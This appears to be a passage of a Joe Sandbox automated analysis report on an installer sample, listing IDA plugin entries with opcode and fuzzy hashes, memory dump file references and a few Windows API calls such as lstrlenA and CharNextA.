                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                              • String ID: Error launching installer
                                                                                                              • API String ID: 3712363035-66219284
                                                                                                              • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                              • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                              • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                              • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                              • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                              • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                              • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                              • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                              • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 190613189-0
                                                                                                              • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                              • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98